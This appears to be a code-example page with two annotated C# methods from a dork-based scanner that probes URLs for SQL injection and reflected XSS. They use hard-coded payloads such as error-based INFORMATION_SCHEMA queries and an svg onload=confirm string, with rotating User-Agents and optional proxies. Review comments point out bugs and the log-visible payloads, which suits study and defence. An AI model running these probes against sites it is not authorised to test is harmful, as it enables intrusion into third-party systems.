コード例 #1
        /// <summary>
        /// Probes the URL in <paramref name="dork"/> for error-based SQL injection. Each hard-coded payload is
        /// inserted through helperObejct.insertPayload, every resulting URL is requested, and the response is
        /// searched for MySQL error strings that the unmodified page does not already contain.
        /// </summary>
        /// <remarks>
        /// The check is a heuristic: it only fires when database error text reaches the response body, so
        /// bruteResult.unvulnerAble means "no signature seen", not "verified safe". The same value is returned
        /// when any exception (for example a timeout) is swallowed by the outer catch, so an untested URL and
        /// a clean URL are indistinguishable to the caller. The payloads are fixed literals, which makes them
        /// matchable in request logs on the receiving side.
        /// </remarks>
        /// <param name="dork">URL under test. On a hit it is overwritten with a summary string
        /// ("url=... | WAF=... | payload=...") unless the UI update throws first.</param>
        /// <param name="objectString">Not read in this body.</param>
        /// <param name="proxy">Passed to helperObejct.setProxy, and only when NeedProxy is true.</param>
        /// <param name="additionalOne">Not read in this body.</param>
        /// <param name="additionalTwo">Not read in this body.</param>
        /// <returns>bruteResult.sql on the first signature match, otherwise bruteResult.unvulnerAble.</returns>
        public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null)
        {
            // In-flight counter: incremented here and decremented once on every exit path below.
            // NOTE(review): ++/-- are not atomic; confirm whether Config is called from several threads.
            transActions++;
            try
            {
                // Static probe strings (quote breakers plus boolean/error-style fragments). They never change
                // between runs, so the literal values are stable indicators in web-server or WAF logs.
                List <string> sqlpayloads = new List <string>()
                {
                    "'",
                    ".(('\".,,,,",
                    "AND 7786=7473-- FNiT",
                    "\"(().()('.",
                    "'YgxvMp<'\">AqklPj",
                    "') AND 7648=7021 AND ('vhCh'='vhCh",
                    " AND (SELECT 5232 FROM(SELECT COUNT(*),CONCAT(0x7178717071,(SELECT (ELT(5232=5232,1))),0x7176717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FeKK",
                    " AND 2229 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(113)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2229=2229) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+CHAR(113)))"
                };
                // One User-Agent is picked per Config call and reused for every request of this call.
                string userAgent = Leaf.xNet.Http.RandomUserAgent();
                // The WAF flag is informational only: it is stored on the finding and does not change the probing.
                bool   waf       = false;
                if (wafProtection(dork))
                {
                    waf = true;
                }
                // A single request object is reused for all payloads.
                // NOTE(review): it is never disposed in this method; confirm ownership/lifetime.
                // timeOut is multiplied by 1000, presumably seconds to milliseconds; verify against helperObejct.
                Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest()
                {
                    IgnoreProtocolErrors = true,
                    AllowAutoRedirect    = false,
                    Cookies          = new CookieStorage(false),
                    ConnectTimeout   = helperObejct.timeOut * 1000,
                    ReadWriteTimeout = helperObejct.timeOut * 1000,
                    KeepAlive        = false,
                    UserAgent        = userAgent
                };
                // Baseline body of the unmodified URL; fetched lazily, once, before the first probe request.
                string baseSource = "";
                foreach (string item in sqlpayloads)
                {
                    if (NeedProxy)
                    {
                        helperObejct.setProxy(ref req, proxy);
                    }
                    List <string> urls = helperObejct.insertPayload(dork, item);
                    foreach (string urlChecking in urls)
                    {
                        // Sentinel returned by insertPayload, presumably meaning the URL has no parameter
                        // to modify (confirm in helperObejct). The whole check stops at the first one.
                        if (urlChecking == "itsnotInjectAble")
                        {
                            transActions--;
                            return(bruteResult.unvulnerAble);
                        }
                        else
                        {
                            if (baseSource.Length <= 0)
                            {
                                baseSource = req.Get(dork).ToString();
                            }
                            req.Get(urlChecking);
                            // The probe response is lower-cased; the baseline above is kept as received.
                            string        source     = req.Response.ToString().ToLower();
                            // Error signatures; the list is rebuilt for every URL.
                            List <string> targetBugs = new List <string>()
                            {
                                "warning: mysql_connect()",
                                "warning: mysql_fetch_row()",
                                "error in your sql syntax",
                                "warning: mysql_result()",
                                "mysql_num_rows()",
                                "mysql_fetch_assoc()",
                                "mysql_fetch_row()",
                                "mysql_numrows()",
                                "mysql_fetch_object()",
                                "MySQL Driver",
                                "MySQL ODBC",
                                "MySQL Error",
                                "error in your SQL syntax"
                            };
                            foreach (string ite in targetBugs)
                            {
                                // NOTE(review): the two sides are compared differently. The response test is
                                // effectively case-insensitive (both operands lower-cased), while the baseline
                                // test is case-sensitive against the raw body and raw signature. A baseline that
                                // already shows the error in different casing is therefore not excluded, which
                                // can produce a false positive.
                                if (source.Contains(ite.ToLower()) && baseSource.Contains(ite) == false)
                                {
                                    // Decrement happens before the UI call, not after it.
                                    transActions--;
                                    try
                                    {
                                        // Copy to a local because a ref parameter cannot be captured by the lambda.
                                        string url = dork;
                                        // Record the finding through mainFormObject.Dispatcher and refresh the result view.
                                        helperObejct.mainFormObject.Dispatcher.Invoke(() =>
                                        {
                                            itsABug bug = new itsABug()
                                            {
                                                id            = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
                                                url           = url,
                                                vulnerability = "sql",
                                                WAF           = waf.ToString(),
                                                payload       = item
                                            };
                                            helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
                                            helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
                                            helperObejct.mainFormObject.resultView.Items.Refresh();
                                        });
                                        // Caller-visible side effect: dork now carries the summary, not the URL.
                                        dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
                                    }
                                    catch
                                    {
                                        // NOTE(review): every failure of the UI update is discarded silently; the
                                        // method still returns sql, and dork stays unchanged if Invoke threw.
                                    }

                                    return(bruteResult.sql);
                                }
                            }
                        }
                    }
                }
                transActions--;
                return(bruteResult.unvulnerAble);
            }
            catch
            {
                // NOTE(review): network errors, timeouts and programming errors all land here and are
                // reported as unvulnerAble without being logged.
                transActions--;
                return(bruteResult.unvulnerAble);
            }
        }
コード例 #2
        /// <summary>
        /// Probes the URL in <paramref name="dork"/> for reflected XSS. One payload built from two random
        /// tokens and three fixed URL-encoded payloads are inserted through helperObejct.insertPayload; each
        /// resulting URL is requested and the body is tested with a regex for an unencoded reflection that
        /// the unmodified page does not already contain.
        /// </summary>
        /// <remarks>
        /// The check only inspects the raw response text; it does not render the page or evaluate context.
        /// bruteResult.unvulnerAble therefore means "no reflection matched", and it is also returned when
        /// any exception is swallowed by the outer catch. The marker "PH09NIXPY74X" is a constant, which
        /// makes these requests matchable in logs on the receiving side.
        /// </remarks>
        /// <param name="dork">URL under test. On a hit it is overwritten with a summary string
        /// ("url=... | WAF=... | payload=...") unless the UI update throws first.</param>
        /// <param name="objectString">Not read in this body.</param>
        /// <param name="proxy">Not read in this body; no setProxy call is made here.</param>
        /// <param name="additionalOne">Not read in this body.</param>
        /// <param name="additionalTwo">Not read in this body.</param>
        /// <returns>bruteResult.xss on the first match, otherwise bruteResult.unvulnerAble.</returns>
        public bruteResult Config(ref string dork, string objectString, string proxy = null, string additionalOne = null, string additionalTwo = null)
        {
            // In-flight counter: incremented here and decremented once on every exit path below.
            // NOTE(review): ++/-- are not atomic; confirm whether Config is called from several threads.
            transActions++;
            try
            {
                // The WAF flag is informational only: it is stored on the finding and does not change the probing.
                bool waf = false;
                if (wafProtection(dork))
                {
                    waf = true;
                }
                // Two tokens from randomText(3) (presumably 3 random characters each; confirm in randomText)
                // bracket the probe so a reflection can be told apart from text already on the page.
                string        first              = randomText(3);
                string        sec                = randomText(3);
                // Sent value: a leading quote, then first<'">sec.
                string        finalpayloadTest   = "'" + first + "<'\">" + sec + "";
                // Expected reflection without the leading quote.
                string        finalpayloadCheck  = "" + first + "<'\">" + sec + "";
                // Verbatim string: the backslashes are literal, giving first<\'\">sec (backslash-escaped quotes).
                string        finalpayloadCheck2 = $@"{first}<\'\"">{sec}";
                List <string> xsspayloads        = new List <string>()
                {
                    finalpayloadTest,
                    "%27%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
                    "%22%3EPH09NIXPY74X0%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
                    "PH09NIXPY74X%3Csvg%2Fonload%3Dconfirm%28%2FPH09NIXPY74X%2F%29%3Eweb",
                };
                // Only read by the fallback loop near the end, which cannot fire (see the note there).
                List <string> containsList = new List <string>()
                {
                    finalpayloadCheck2, finalpayloadCheck
                };
                // One User-Agent is picked per Config call and reused for every request of this call.
                string userAgent  = Leaf.xNet.Http.RandomUserAgent();
                // Baseline body of the unmodified URL; fetched lazily, once, before the first probe request.
                string sourceBase = "";
                foreach (string item in xsspayloads)
                {
                    List <string> urls = helperObejct.insertPayload(dork, item);
                    foreach (string urlNew in urls)
                    {
                        // Sentinel returned by insertPayload, presumably meaning the URL has no parameter
                        // to modify (confirm in helperObejct). The whole check stops at the first one.
                        if (urlNew == "itsnotInjectAble")
                        {
                            transActions--;
                            return(bruteResult.unvulnerAble);
                        }
                        else
                        {
                            // A fresh request object per URL, with redirects followed.
                            // NOTE(review): none of these objects is disposed in this method.
                            // timeOut is multiplied by 1000, presumably seconds to milliseconds; verify against helperObejct.
                            Leaf.xNet.HttpRequest req = new Leaf.xNet.HttpRequest()
                            {
                                IgnoreProtocolErrors = true,
                                AllowAutoRedirect    = true,
                                Cookies          = new CookieStorage(false),
                                ConnectTimeout   = helperObejct.timeOut * 1000,
                                ReadWriteTimeout = helperObejct.timeOut * 1000,
                                KeepAlive        = false,
                                UserAgent        = userAgent
                            };
                            if (sourceBase.Length <= 0)
                            {
                                sourceBase = req.Get(dork).ToString();
                            }
                            string source = req.Get(urlNew).ToString();
                            // Alternation of: the fixed marker immediately followed by "<svg", or either check string.
                            // NOTE(review): the check strings are concatenated into the pattern without Regex.Escape,
                            // so the backslashes in finalpayloadCheck2 act as regex escapes rather than literal
                            // characters, and the pattern is rebuilt for every URL although it does not change.
                            Regex  rx     = new Regex("PH09NIXPY74X<svg|" + finalpayloadCheck + "|" + finalpayloadCheck2);
                            // Hit only when the probe response matches and the baseline does not.
                            if (rx.IsMatch(source) && rx.IsMatch(sourceBase) == false)
                            {
                                // Decrement happens before the UI call, not after it.
                                transActions--;
                                try
                                {
                                    // Copy to a local because a ref parameter cannot be captured by the lambda.
                                    string url = dork;
                                    // Record the finding through mainFormObject.Dispatcher and refresh the result view.
                                    helperObejct.mainFormObject.Dispatcher.Invoke(() =>
                                    {
                                        itsABug bug = new itsABug()
                                        {
                                            id            = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
                                            url           = url,
                                            vulnerability = "xss",
                                            WAF           = waf.ToString(),
                                            payload       = item
                                        };
                                        helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
                                        helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
                                        helperObejct.mainFormObject.resultView.Items.Refresh();
                                    });
                                    // Caller-visible side effect: dork now carries the summary, not the URL.
                                    dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
                                }
                                catch
                                {
                                    // NOTE(review): every failure of the UI update is discarded silently; the
                                    // method still returns xss, and dork stays unchanged if Invoke threw.
                                }

                                return(bruteResult.xss);
                            }
                            else
                            {
                                foreach (var STR in containsList)
                                {
                                    // NOTE(review): this condition is "X && !X" on the same string and is always
                                    // false, so the block below is unreachable. The second operand was presumably
                                    // meant to test the baseline (sourceBase), as the regex branch above does.
                                    if (source.Contains(STR) && source.Contains(STR) == false)
                                    {
                                        transActions--;
                                        try
                                        {
                                            string url = dork;
                                            helperObejct.mainFormObject.Dispatcher.Invoke(() =>
                                            {
                                                itsABug bug = new itsABug()
                                                {
                                                    id            = (helperObejct.mainFormObject.vulnerableUrlsList.Count + 1).ToString(),
                                                    url           = url,
                                                    vulnerability = "xss",
                                                    WAF           = waf.ToString(),
                                                    payload       = item
                                                };
                                                helperObejct.mainFormObject.vulnerableUrlsList.Add(bug);
                                                helperObejct.mainFormObject.resultView.ItemsSource = helperObejct.mainFormObject.vulnerableUrlsList;
                                                helperObejct.mainFormObject.resultView.Items.Refresh();
                                            });
                                            dork = $"url={dork} | WAF={waf.ToString()} | payload={item.ToString()}";
                                        }
                                        catch
                                        {
                                        }

                                        return(bruteResult.xss);
                                    }
                                }
                            }
                        }
                    }
                }
                transActions--;
                return(bruteResult.unvulnerAble);
            }
            catch
            {
                // NOTE(review): network errors, timeouts and programming errors all land here and are
                // reported as unvulnerAble without being logged.
                transActions--;
                return(bruteResult.unvulnerAble);
            }
        }